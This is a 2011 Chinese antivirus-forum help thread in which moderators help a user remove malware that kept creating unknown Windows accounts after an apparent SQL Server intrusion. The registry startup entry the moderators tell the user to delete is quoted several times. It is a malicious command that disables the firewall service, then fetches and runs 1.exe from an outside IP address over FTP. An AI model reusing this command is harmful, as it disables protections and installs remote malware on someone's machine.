被入侵，被侮辱，出现三个莫名其妙的用户 bbs.ikaka.com

让18 - 2011-6-9 21:19:00

多年来一直使用瑞星，感觉不错
月前发现电脑出现一个莫名其妙的用户，屡删不掉，求助瑞星卡卡后问题解决
本人平常一般上班即在线，下班即休眠。昨天偶尔开关机又发现新出来一个用户＊＊＊，遂在用户管理里面删除用户。今天不放心，在此开关机，发现竟然又多出现三个用户，分别是adminss、caolimal、IIS-SERVER，更可悲的是用我原来的用户登陆后进入用户管理，准备删除这三个用户，竟然是“Windows 不能打开用户帐户控制面板”，用瑞星杀毒后，未能解决。
万能的瑞星，我的电脑是不是被别人控制了，救救我吧

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

让18 - 2011-6-9 21:20:00

上次出现问题时候，我的求助：
http://bbs.ikaka.com/showtopic-8982905.aspx

让18 - 2011-6-9 21:30:00

扫描的日志

附件: SREngLOG.rar

oooper - 2011-6-9 21:50:00

我也出现caonima1这个账户、SQL被入侵。。。格式化系统了。

让18 - 2011-6-9 22:06:00

东西太多，不敢格式化系统

让18 - 2011-6-9 22:07:00

斑竹，救救我

让18 - 2011-6-9 22:21:00

斑竹，下班了

oooper - 2011-6-9 22:22:00

最近中这病毒的人不少。我等不及才格式化重装了。就算杀毒成功了，也怀疑系统的安全性了。

豪斯登堡新郎 - 2011-6-10 4:55:00

引用:

==================================
服务
[Application Management / AppMgmt][Stopped/Manual Start]
<C:\WINDOWS\system32\svchost.exe -k netsvcs-->%SystemRoot%\System32\appmgmts.dll><N/A>(找个系统文件appmgmts.dll替换一下)

[Rmhcxw Gnpemrem Jaxtpfas Jwwp / Qepmss Itlkfngr Dik][Stopped/Auto Start]
<C:\WINDOWS\System32\svchost.exe -k imgsvc-->C:\Program Files\Asar\Xafwfiwpg.jpg><N/A>

[WxHtgU yNrEENPic / tECMOnai][Running/Auto Start]
<C:\WINDOWS\system32\iSql\C608.exe><N/A>

==================================
浏览器加载项

[BDSrchHook Class]
{BC207F7D-3E63-4ACA-99B5-FB5F8428200C} <C:\WINDOWS\DOWNLO~1\BDSrHook.dll, >
[]
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} <, >

==================================
正在运行的进程
[C:\WINDOWS\DOWNLO~1\BDSrHook.dll] [, 2, 0, 1, 2]

networkedition - 2011-6-10 9:23:00

c:\windows\system32\isql\c608.exe
c:\windows\downlo~1\bdsrhook.dll
C:\Program Files\Asar\Xafwfiwpg.jpg这个文件瑞星可以查杀。
以上文件找到压缩发来。

networkedition - 2011-6-10 9:27:00

sqlserver建议打全软件补丁，设置强sa密码，修改默认的1433端口。来防范sql入侵。

让18 - 2011-6-10 10:09:00

引用:

原帖由 networkedition 于 2011-6-10 9:23:00 发表
c:\windows\system32\isql\c608.exe
c:\windows\downlo~1\bdsrhook.dll
C:\Program Files\Asar\Xafwfiwpg.jpg这个文件瑞星可以查杀。
以上文件找到压缩发来。

昨天晚上捣鼓一晚上，瑞星可能已经把他们干掉了，至少c608.exe我记得肯定杀掉了，刚刚查了一下没有上述文件，又扫描了一下，请大班看一下

附件: SREngLOG0110610.rar

networkedition - 2011-6-10 10:15:00

c:\program files\asar\xafwfiwpg.jpg看一下这个文件还有吗？
启动项目－－注册表之如下项删除：
[shell] <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi>

让18 - 2011-6-10 11:29:00

1、c:\program files\asar\xafwfiwpg.jpg 全盘检索没有找到
2、启动项目－－注册表之如下项删除：

[shell] <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi>

删除时候显示“无法编辑”

networkedition - 2011-6-10 11:31:00

右键属性添加everyone并设置完全控制权限，再删除。

让18 - 2011-6-10 14:53:00

按指示已可以删除：
启动项目－－注册表之如下项删除：

[shell] <shell><c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 125.46.68.199> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 1.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&exi>

但是问题仍存在，表现为：多出来3个用户，用户管理被屏蔽

networkedition - 2011-6-10 14:59:00

注册表查看这项：HKEY_LOCAL_MACHINE\SAM，同样需要添加权限才可以。在这里查看是否有那三个多出的用户。

让18 - 2011-6-10 15:46:00

引用:

原帖由 networkedition 于 2011-6-10 14:59:00 发表
注册表查看这项：HKEY_LOCAL_MACHINE\SAM，同样需要添加权限才可以。在这里查看是否有那三个多出的用户。

没有，只有这个，看不懂：

让18 - 2011-6-10 15:55:00

引用:

原帖由 networkedition 于 2011-6-10 14:59:00 发表
注册表查看这项：HKEY_LOCAL_MACHINE\SAM，同样需要添加权限才可以。在这里查看是否有那三个多出的用户。

networkedition - 2011-6-10 15:57:00

将QQ号通过站内短消息发送给我，远程看一下吧。

让18 - 2011-6-10 16:52:00

:kaka12: 大版主出手果然不同凡响，谢谢终于恢复正常，您太有才了。
还有个小问题，以免再中招：
1、这是什么病毒？
2、怎么注意？

networkedition - 2011-6-10 16:56:00

详见11楼:kaka12:

让18 - 2011-6-10 16:58:00

呵，研究一下1
谢谢

让18 - 2011-6-10 16:58:00

呵，研究一下1
谢谢

werr077wd - 2011-6-14 10:40:00

我认为你应该把区域网和互联网都断掉，如果他还能控制就肯定是病毒。如果是病毒就说明杀毒软件没有查到，而只能手动解决。

瑞星卡卡安全论坛